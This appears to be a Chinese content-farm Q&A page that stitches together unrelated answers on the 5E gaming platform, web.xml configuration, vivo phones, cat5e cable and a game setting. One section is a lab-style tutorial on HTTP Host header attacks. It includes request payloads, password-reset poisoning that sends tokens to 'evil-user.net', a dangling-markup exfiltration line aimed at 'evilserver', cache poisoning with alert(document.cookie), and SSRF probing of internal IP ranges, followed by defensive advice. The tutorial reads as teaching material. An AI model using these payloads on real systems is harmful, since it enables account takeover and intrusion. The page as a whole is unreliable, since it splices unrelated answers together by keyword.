當前位置:首頁 » 存儲配置 » 5e配置文件被攔截會有什麼影響

5e配置文件被攔截會有什麼影響

發布時間: 2022-12-12 07:20:51

A. 5E對戰平台打開CSGO沒反應

可能是機器設置問題,5E會有提示怎麼防止文件被攔截,還有跟電腦的配置也有一定的影響,在等待期間建議不要運行其他程序

B. web.xml文件主要配置有哪些,都有什麼含義

①web.xml文件是用來配置:歡迎頁、servlet、filter等配置文件用的。當你的web工程沒用到這些時,你可以不用web.xml文件來配置你的web工程

web.xml的模式文件中定義的標簽並不是定死的,模式文件也是可以改變的,一般來說,隨著web.mxl模式文件的版本升級,裡面定義的功能會越來越復雜,

也即標簽元素的種類會越來越多,但有些是不常用的,我們只需記住一些常用的就可以了。

首先是定義頭和根元素

聲明為xml文件,版本為1.0,編碼為utf-8

聲明該文件的內容可以使用xsi的標簽庫

聲明標簽的使用范圍是被javaee的開發使用的

聲明可以使用的標簽庫和對應的具體的標簽庫版本地址。

web.xml的模式(Schema)文件中定義了多少種標簽元素,它就能擁有定義出來的那些功能

隨著web.mxl模式文件的版本升級,裡面定義的功能會越來越復雜,也即標簽元素的種類會越來越多.

定義項目的名稱.

項目名稱

歡迎頁面

servlet

配置springmvc DispatcherServlet( 前台控制器)-->example這個Servlet的名字是example,可以有多個DispatcherServlet,是通過名字來區分的。

async-supported

啟動一個新的線程去處理你的請求,完成之後調用你指定的回調函數來完成整個非同步操作。

一般的jsp是通過地址欄輸入一個地址,或者提交表單的方式發送請求的,這樣網頁都會被刷新。但是如果你在jsp頁面發送一個ajax請求的話,跟前兩種不同,

後台會返回給jsp頁面內容,頁面不會直接刷新,這樣可以把返回的數據寫在頁面的div中,這樣就完成了頁面的局部刷新。

舉個例子,你做一個查詢功能,頁面上有查詢條件和查詢結果顯示區域,你可以點查詢按鈕的時候通過ajax非同步發送你的查詢條件,

而你得到後台返回的查詢結果後,更新你的jsp頁面的查詢結果,jsp的其他部分,比如查詢條件,都沒有更新,jsp沒有刷新,而是更新了查詢結果這一塊內容

  url-pattern   默認匹配所有請求Servlet攔截匹配規則可以自已定義1、攔截*.do、*.htm, 例如:/user/add.do,這是最傳統的方式,最簡單也最實用。不會導致靜態文件(jpg,js,css)被攔截。2、攔截/,例如:/user/add,可以實現現在很流行的REST風格。很多互聯網類型的應用很喜歡這種風格的URL。弊端:會導致靜態文件(jpg,js,css)被攔截後不能正常顯示。

監聽器

Listener獲取的是Web應用ServletContext(application)的配置參數。-為Web應用配置Listener的兩種方式: 使用@WebListener修飾Listener實現類即可 在web.xml文檔中使用進行配置。我們選擇web.xml這種配置方式,只有一個元素指定Listener的實現類.

②啟動WEB項目的時候,Tomcat容器首先會去它的配置文件讀取兩個節點listener和context-param。

然後Tomcat會創建一個ServletContext(application),WEB項目所有部分都將共享這個上下文

將applicationContext.xml存入ServletContext中

Tomcat容器根據class類路徑來創建監聽

上面這些都是在web項目還沒有完全啟動起來就完成的工作,而servlet是在第一次發起請求時被實例化的

而且一般不會被容器銷毀,並服務於多個用戶的請求.

web.xml的載入順序是: context-param-> listener -> filter -> servlet.

filter

Filter可認為是Servlet的「增強版」,因此Filter配置與Servlet的配置非常相似,需要配置兩部分:配置Filter名稱和Filter攔截器URL模式。區別在於Servlet通常只配置一個URL,而Filter可以同時配置多個請求的URL。配置Filter有兩種方式:

在Filter類中通過Annotation進行配置。

在web.xml文件中通過配置文件進行配置。

①網路

②http://blog.csdn.net/believejava/article/details/43229361

1.在web.xml里配置監聽器、過濾器、攔截器,書寫順序有沒有什麼要求?

根據網上資料來分析,應該是沒有書寫順序的要求,容器會按照自己的載入方式去載入順序.

2.監聽器是必須要配置的嗎?

不是必須要配置.

3假設配置了多個listener,那麼會先載入哪個listener

如果有多個listener的情況下,我們可以根據自己的需要去手動設置先去載入哪個listener.

今天的分享就到這里啦,歡迎大家點贊、轉發、留言、拍磚~

技能樹.IT修真院

「我們相信人人都可以成為一個工程師,現在開始,找個師兄,帶你入門,掌控自己學習的節奏,學習的路上不再迷茫」。

這里是技能樹.IT修真院,成千上萬的師兄在這里找到了自己的學習路線,學習透明化,成長可見化,師兄1對1免費指導。快來與我一起學習吧~

http://www.jnshu.com/login/1/14708688

PPT :  https://ptteng.github.io/PPT/PPT-java/Java-task2-webxml.html#/

C. vivoS15e怎麼查我把對方電話拉黑了,看看對方來電沒有怎麼查看

vivo S15e機型查看攔截黑名單的記錄:可以進入i管家--實用工具--騷擾攔截--電話攔截/信息攔截--電話攔截記錄/攔截記錄里查看。

D. 1*cat5e跟utp-cat 5e有什麼區別

utp5e和cat5e的區別:

1、超五類網線無法和超五類非屏蔽雙絞線相比,因為超五類網線包括超五類非屏蔽雙絞線,所以它們無法進行比較區分,只能問超五類屏蔽網線和超五類非屏蔽網線有什麼區別。

2、STP外面由一層金屬材料包裹,以減小輻射,防止信息被竊聽。同時具有較高的數據傳輸速率,但價格較高,安裝也比較復雜;UTP無金屬屏蔽材料,只有一層絕緣膠皮包裹,價格相對便宜,組網靈活;


utp5e和cat5e的關系:

CAT 5E超五類網線分為UTP 5E超五類非屏蔽雙絞線和STP 5E屏蔽超五類屏蔽雙絞線,非屏蔽雙絞線電纜是由多對雙絞線和一個塑料外皮構成。五類是指國際電氣工業協會為雙絞線電纜定義的五種不同的質量級別。



E. weblogichost頭攻擊配置

1. HTTP Host頭攻擊

從HTTP / 1.1開始,HTTP Host標頭是必需的請求標頭。它指定客戶端要訪問的域名。例如,當用戶訪問https://example.net/web-security時,其瀏覽器將組成一個包含Host標頭的請求,如下所示:

GET /web-security HTTP/1.1
Host: example.net
HTTP Host頭的目的是幫助識別客戶端要與之通信的後端組件。如果請求不包含Host頭或者格式不正確,則在將傳入請求的應用程序時可能會導致問題。

從歷史上看,這種漏洞並不存在太大問題,因為每個IP地址只會被用於單個域的內容。如今,很大程度上是由於同一個IP上存在多個Web應用程序(不同埠,不同域名解析等),通常可以在同一IP地址訪問多個網站和應用程序。這種方法的普及也部分是由於IPv4地址耗盡所致。

當可以通過同一IP地址訪問多個應用程序時,最常見的原因是以下情況之一:

虛擬主機

單個Web伺服器託管多個網站或應用程序。這可能是具有單個所有者的多個網站,但是也可能是不同所有者的網站託管在同一個共享平台上。它們都與伺服器共享一個公共IP地址。

通過代理路由流量

網站託管在不同的後端伺服器上,但是客戶端和伺服器之間的所有流量都通過代理系統進行路由。這可能是一個簡單的負載平衡設備或某種反向代理伺服器。在客戶通過內容分發網路(CDN)訪問網站的情況下,這種設置尤其普遍。

在上面兩種種情況下,即使網站託管在單獨的後端伺服器上,它們的所有域名也都解析為中間組件的單個IP地址。這帶來了與虛擬主機相同的問題,因為反向代理或負載平衡需要知道每個請求到的哪個後端上。

HTTP Host頭的作用就在於,指定請求應該發送到那個應用程序的後端伺服器上。打個比方,一封信需要送到居住在公寓樓中的某人手中,整個公寓有許多房間,每個房間都可以接受信件,通過指定房間號和收件人(也就是HTTP Host頭)來將信封送到指定的人手中。

3. 什麼是HTTP Host頭攻擊

一些網站以不安全的方式處理Host頭的值。如果伺服器直接信任Host頭,未校驗它的合法性,則攻擊者可能能夠使用此可控變數來注入Host,以操縱伺服器端的行為。

現成的Web應用程序通常不知道將它們部署在哪個域上,除非在安裝過程中在配置文件中手動指定了該域。例如,當他們需要知道當前域以生成電子郵件中包含的絕對URL時,他們可能依賴於Host頭中的值:

<a href="https://_SERVER['HOST']/support">聯系支持</a>
Host頭值還可以用於不同網站系統之間的各種交互。

由於Host頭實際上是用戶可控制的,因此這種做法可能導致許多問題。如果未校驗或者直接使用Host頭,則Host頭可以與一系列其他漏洞「組合拳」攻擊,比如:

緩存投毒

特殊業務功能的邏輯漏洞

基於路由的SSRF

經典服務端漏洞,如SQL注入(當Host被用於SQL語句時)等

4. 如何發掘HTTP Host頭攻擊

首先要判斷服務端是否檢測Host頭?檢測完了是否還使用Host頭的值?

通過修改Host的值,如果服務端返回錯誤信息:

.png
則說明服務端檢測了Host的內容。至於有沒有使用Host頭的值,有以下幾種方法去發掘:

修改Host值

簡單的來說,可以修改HTTP頭中的Host值,如果觀察到響應包中含有修改後的值,說明存在漏洞。

但有時候篡改Host頭的值會導致無法訪問Web應用程序,從而導致「無效主機頭」的錯誤信息,特別是通過CDN訪問目標時會發生這種情況。

添加重復的Host頭

添加重復的Host頭,通常兩個Host頭之中有一個是有效的,可以理解為一個是確保請求正確地發送到目標伺服器上;另一個則是傳遞payload到後端伺服器中。

GET /example HTTP/1.1
Host: vulnerable-website.com
Host: attackd-stuff
使用絕對路徑的URL

盡管許多請求通常在請求域上使用相對路徑,但是也同時配置了絕對URL的請求。

GET https://vulnerable-website.com/ HTTP/1.1
Host: attack-stuff
有時候也可以嘗試不同的協議,如HTTP或HTTPS。

添加縮進或換行

當一些站點block帶有多個Host頭的請求時,可以通過添加縮進字元的HTTP頭來繞過:

GET /example HTTP/1.1
Host: attack-stuff
Host: vulnerable-website.com
注入覆蓋Host頭的欄位

與Host頭功能相近的欄位,如X-Forwarded-Host、X-Forwarded-For等,這些有時候是默認開啟的。

GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: attack-stuff
諸如此類,還有其他的欄位:

X-Host

X-Forwarded-Server

X-HTTP-Host-Override

Forwarded

忽略埠僅校驗域名

當修改、添加重復Host頭被攔截的時候,可以嘗試了解Web應用程序是怎樣解析Host頭的。

比如,一些解析演算法會忽略Host頭中的埠值,僅僅校驗域名。這時候可以將Host修改為如下形式:

GET /example HTTP/1.1
Host: vulnerable-website.com:attack-stuff
保持域名不變,修改埠值為非埠號的其他值(非數字), 將Host頭攻擊的payload放在埠值處,同樣能進行Host頭攻擊。

5. HTTP Host頭攻擊漏洞示例

5.1 密碼重置中毒

根據HTTP Host頭攻擊的攻擊特點,它被廣泛應用於密碼重置中毒:攻擊者可以操縱網站在重置密碼情況下生成的密碼重置鏈接,使其發送攻擊者指定的域下,利用此來竊取重置任意用戶密碼的令牌。

.png
一個重設密碼(忘記密碼)功能的大致流程如下:

用戶輸入其用戶名或電子郵件地址,然後提交密碼重置請求。

該網站檢查該用戶是否存在,然後生成一個臨時的、唯一的、復雜的令牌,該令牌與後端的用戶帳戶相關聯。

該網站向用戶發送一封電子郵件,其中包含用於重置其密碼的鏈接。重置令牌的參數包含在相應的URL中:

https://normal-website.com/reset?token=0a1b2c3d4e5f6g7h8i9j
4. 當用戶訪問此URL時,網站將檢查提供的令牌是否有效,並使用它來確定要重置哪個帳戶。如果一切都符合,則可以進入用戶重置密碼步驟。最後,令牌被銷毀。

以上步驟的安全性依賴於:只有目標用戶才能訪問其電子郵件,從而可以訪問其唯一的令牌。

密碼重置中毒是竊取此令牌以更改另一個用戶密碼的一種漏洞。

如果網站重置密碼的流程完全依賴用戶的可控輸入(如HTTP Host頭),這可能導緻密碼重置中毒:

1. 攻擊者獲取受害者的用戶名或者電子郵件,作為提交重置密碼的請求,攻擊者會攔截請求並修改HTTP Host頭為其指定的域,如evil-user.net

2. 受害者會收到一封重置密碼的郵件,但由於攻擊者修改了Host頭,而web程序生成重置鏈接又完全依賴於Host頭,導致生成以下URL:

https://evil-user.net/reset?token=0a1b2c3d4e5f6g7h8i9j
3. 如果受害者點擊了該鏈接,重置密碼的令牌就會發送到攻擊者的伺服器 evil-user.net 上

4. 當攻擊者獲取到蟲子密碼的令牌之後,就會進行相應的構造訪問真實重置密碼的URL進行密碼重置。

5.1.1 密碼重置中毒—基礎

詳細了解了上面的密碼重置中毒的流程和原理之後,這里通過HTTP Host頭攻擊導致的基礎的密碼重置中毒來演示。

首先輸入用戶名或者用戶的電子郵箱來重置指定用戶的密碼:

.png
提交之後,會發送一封重置密碼的電子郵件到wiener用戶的郵箱中(數據包如右圖):

.png
注意重置密碼的鏈接,可能是受Host頭的值的影響?

我們來驗證一下是否存在HTTP Host頭攻擊,修改Host頭的值為 .com:

.png
發現請求是可以被後端伺服器接收的,所以是存在HTTP Host頭攻擊的。

這里就輸入受害用戶carlos進行重置密碼,然後抓包將Host頭的值改為我們自己的伺服器:

.png
然後在我們自己的伺服器上就可以通過訪問日誌看到被竊取的重置密碼Token:

.png
然後根據已知鏈接規律,構造重置密碼的鏈接:

https://.web-security-academy.net/forgot-password?temp-forgot-password-token=
.png
隨即進入輸入新密碼的界面,密碼重置中毒成功。

5.1.2 密碼重置中毒—注入覆蓋Host頭的欄位

有時候直接修改Host頭、添加重復Host頭的值以及混淆Host頭都不行:

.png
可以嘗試使用與Host頭功能相同的HTTP欄位,如X-Forwarded-Host、X-Forwarded-For等,可以進行Fuzz:

.png
實際上他能夠被 X-Forwarded-Host 欄位影響,導致Host頭攻擊,當同時添加多個欄位使請求被攔截時,可以嘗試類似排除法、二分法來排查哪個欄位有效。

對受害用戶carlos進行密碼重置投毒:

.png
然後構造鏈接即可:

https://.web-security-academy.net/forgot-password?temp-forgot-password-token=
.png
5.1.3 重置密碼中毒—Dangling Markup技術

首先簡單介紹一下 Dangling Markup技術:

Dangling markup技術

Dangling markup技術, 是一種無需腳本即可竊取頁面內容的技術,它使用圖像等資源(結合CSP運行的策略)將數據發送到攻擊者控制的遠程位置。當反射型XSS不工作或被內容安全策略(CSP)阻止時,它非常有用。其思想是插入一些未完成狀態的部分HTML,例如圖像標記的src屬性,頁面上的其餘標記關閉該屬性,但同時將兩者之間的數據(包含竊取頁面的內容)發送到遠程伺服器。

例如,我們在反射型XSS注入點上注入這樣一個img標簽:

<img src="https://evilserver/?
則注入點和下一個雙引號的代碼將會發送到攻擊者的 https://evilserver 伺服器, 其中被發送的代碼或者內容可能包含一些敏感信息, 例如CSRF Token等, 配合反射型XSS以完成CSRF的利用。

關於 Dangling Markup技術 的實戰意義可以參考博主之前的文章:繞過CSP之Dangling markup技術

什麼時候可以使用 Dangling Markup技術 呢?與我們這篇文章的主題有什麼關系呢?

我們直接進入主題,當輸入需要重置密碼的用戶名後,該用戶的郵箱內會收到如下郵箱:

.png
有一個跳轉到登錄界面的鏈接,後面緊接著重置之後的隨機密碼。

此時考慮一下,該鏈接是否是從Host頭取值而來?只要這個值可控,那麼就可以利用Host頭攻擊實施 Dangling Markup攻擊,包含住鏈接後面緊跟著的密碼,再結合Host頭攻擊將請求指定到攻擊者伺服器上。一個漫天過海的竊取行為就完成了。

第一步,尋找Host頭攻擊點:

通過Fuzz,可發現Host頭攻擊類型為 忽略埠僅校驗域名。即服務端在校驗Host域的時候,僅校驗了域名,忽略了後面的埠號,造成埠值可控(可以是數字或字元):

.png .png
通過在Host頭的埠中注入payload,依舊可以實現Host頭攻擊。

第二步,藉助可控變數 Host:ip:port 來實施 Dangling Markup技術,從而將後面的密碼外帶到攻擊者伺服器上:

注意,需要閉合此處的雙引號出去,經過嘗試,輸入單引號時,服務端會自動轉為雙引號,故這里通過單引號將雙引號閉合,然後添加自定的<a href=xxx.attack-domain>標簽將密碼外帶:

.png
原本的正常HTML是這樣的:

.png
通過Dangling Markup技術 在a標簽的鏈接中注入? 符,使得後面的值在雙引號閉合之前全部被當做URL參數請求到攻擊者伺服器上:

.png
這也是 Dangling Markup技術 的精髓所在,該技術的核心點在於:

可控變數後面是否接著需要竊取的關鍵數據(包括Token、密碼等)
在攻擊者伺服器上可以看到被Host頭攻擊轉發上來的請求,裡面成功竊取了受害者重置後的密碼:

.png
5.2 Host頭攻擊+緩存投毒

當存在Host頭攻擊的web站點不存在密碼重置的功能的時候,此時該漏洞就顯得沒有影響,因為不可能驅使用戶去抓包修改Host頭,輔助攻擊者完成一系列的攻擊。

但是,如果目標站點使用Web緩存,則可以通過緩存投毒給其他用戶提供帶有病毒的緩存響應。此時的Host頭攻擊漏洞轉變為類似XSS存儲型類的漏洞。要構造Web緩存投毒攻擊:

1. 需要尋找映射到其他用戶請求的緩存鍵;
2. 下一步則是緩存此惡意響應;
3. 然後,此惡意緩存將提供給嘗試訪問受影響頁面的所有用戶。
第一步,尋找Host頭攻擊點:

通過對站點的主頁添加重復的Host值,可以達到覆蓋的效果,並驗證存在Host頭攻擊:

.png
第二步,尋找是否使用了Web緩存?緩存鍵是什麼?

從上圖中也可以發現,站點使用了Wen緩存功能,並且配合Host頭攻擊,可以緩存/resources/js/tracking.js資源文件。

第三步,在攻擊者伺服器上創建一個同名的 /resources/js/tracking.js資源文件,內容為:

alert(document.cookie);
然後通過Host頭注入攻擊者伺服器域名,可以看到在響應中正確地對應了我們的 /resources/js/tracking.js資源文件:

.png
發送多次請求,使該請求的響應變為緩存:

.png
當其他用戶請求站點主頁時,服務端就會提供該惡意緩存給用戶,造成緩存投毒。

5.3 Host頭攻擊繞過訪問控制

出於安全考慮,通常網站對某些功能的訪問限制為內部用戶使用。但是通過Host頭攻擊一定可能上可以繞過這些限制。

對於一個站點,從發現Host頭攻擊到利用,下面來展示一個完整的流程:

第一步,訪問主頁,隨意修改Host的值:

.png
注意,這里的Host的值不會出現響應包中,但是依然可能存在Host頭攻擊,因為響應依然成功,說明服務端沒有對Host頭做驗證。

第二步,尋找敏感頁面,通過 /robots.txt 知道 /admin 為做了訪問控制的頁面:

.png
可以錯誤信息提示,/admin 頁面只允許本地用戶訪問。

第三步,將Host改為服務端內部地址,從而繞過IP訪問控制:

.png
5.4 Host頭攻擊+SSRF

Host頭攻擊可能會導致基於路由的SSRF攻擊,稱為:Host SSRF Attack。

經典的SSRF攻擊通常基於XXE或可利用的業務邏輯,將用戶可控的URL作為HTTP請求發送;而基於路由的SSRF依賴於雲部署的體系結構中,包括負載均衡和反向代理,這些中間件將請求分配發送到對應的後端伺服器處理,如果服務端未校驗Host頭轉發的請求,則攻擊者可能會將請求發送(重定向)到體系中的任意系統。

這可能需要知道內部系統的IP地址(私有地址),一般可以通過信息收集或者Fuzz來判斷有效的私有IP地址(如枚舉192.168.1.1/16)。

5.4.1 基礎Host頭攻擊+SSRF

比如,普通方式訪問不到 /admin 頁面(404):

.png
猜測 /admin 存在於內網中,需要內網機器才能訪問,但是配合Host頭攻擊+SSRF可以繞過並訪問。

第一步,判斷Host是否被使用,可用DNSLog外帶

這里我使用Burp自帶的 「Burp Collaborator client」 來實現外帶:

.png
說明服務端是根據Host頭的域名來請求資源的。

第二步,基於Host頭的SSRF探測內網主機

假如一些敏感的頁面(比如管理頁面),深處於內網,外網無法訪問,但是通過Host頭攻擊+SSRF可達到繞過訪問控制,從而訪問內網資產,這里Fuzz內網的IP的C段為192.168.0.0/24,直接利用Intruder枚舉:

.png .png
得到內網IP為192.168.0.240

第三步,訪問內網資源

構造 /admin 頁面,在Host處換位內網IP:

.png
5.4.2 Host頭攻擊+SSRF—使用絕對路徑的URL

有時候服務端會校驗Host頭的值,如果Host被修改,服務端會拒絕一切修改過後的請求:

.png
普通請求通常在請求域上使用相對路徑,但是,服務端也同時可能配置了絕對URL的請求,採用如下形式可繞過對Host的驗證:

GET http://.web-security-academy.net/ HTTP/1.1
.png
接著用 「Burp Collaborator client」 進行外帶:

.png
外帶成功,說明Host頭被服務端使用來向指定域名請求資源,直接SSRF爆破內網:

.png
訪問內網頁面:

.png
6 HTTP Host頭攻擊防護

最簡單的方法是避免在伺服器端代碼中完全使用Host頭,可以只使用相對URL。

其他方法包括:

6.1 正確配置絕對域名URL

當必須使用絕對域名URL時,應在配置文件中手動指定當前域的URL,並引用配置的值,而不是從HTTP的Host頭中獲取。這種方法可防止密碼重置的緩存投毒。

6.2 白名單校驗Host頭的域

如果必須使用Host頭,需要正確校驗它的合法性。這包括允許的域,並使用白名單校驗它,以及拒絕或重定向對無法識別的主機請求。這包括但不僅限於單個web應用程序、負載均衡以及反向代理設備上。

6.3 不支持主機頭覆蓋

確保不適用與Host頭功能相近的欄位,如X-Forwarded-Host、X-Forwarded-For等,這些有時候是默認開啟的。

值得一提的是,不應該將內網使用的Host主機(不出網)與公網的應用程序託管在同一個伺服器上,否則攻擊者可能會操縱Host頭來訪問內部域。

F. 5e僵屍逃跑怎麼屏蔽僵屍聲音

1、首先打開5e僵屍逃跑游戲進入界面。
2、其次點擊游戲設置。
3、最後找到聲音設置點擊屏蔽僵屍聲音即可。

G. vivos15e配置

vivo S15e機型主要參數:
操作系統:OriginOS Ocean(基於Android 11)
屏幕:6.44英寸,解析度2404 × 1080
拍照:後置:5000萬像素主攝+800萬像素超廣角鏡頭+200萬像素微距鏡頭;前置:1600萬像素
處理器:Exynos 1080 八核 2.8GHz*1+2.6GHz*3+2.0GHz*4
外觀尺寸:159.7*73.6*8.49 mm
電池容量:4700mAh(典型值),不可拆卸電池
重量:霧凇⾦:約190.8g,冰晶藍、螢⽯⿊:約189.8g
SIM卡規格:雙Nano卡
網路支持:聯通電信2G、3G、4G、5G網路;移動2G、4G、5G網路
機身內存:8G RAM+128G/256G ROM 、12G RAM+256G ROM
擴展存儲:不支持擴展存儲
連接:Type-C介面、雙頻WiFi、藍牙5.2、GPS、OTG
感應器:重力感應器、接近感應器、光敏感應器、陀螺儀、電子羅盤。

熱點內容
java返回this 發布:2025-10-20 08:28:16 瀏覽:600
製作腳本網站 發布:2025-10-20 08:17:34 瀏覽:892
python中的init方法 發布:2025-10-20 08:17:33 瀏覽:586
圖案密碼什麼意思 發布:2025-10-20 08:16:56 瀏覽:771
怎麼清理微信視頻緩存 發布:2025-10-20 08:12:37 瀏覽:690
c語言編譯器怎麼看執行過程 發布:2025-10-20 08:00:32 瀏覽:1017
郵箱如何填寫發信伺服器 發布:2025-10-20 07:45:27 瀏覽:261
shell腳本入門案例 發布:2025-10-20 07:44:45 瀏覽:120
怎麼上傳照片瀏覽上傳 發布:2025-10-20 07:44:03 瀏覽:810
python股票數據獲取 發布:2025-10-20 07:39:44 瀏覽:719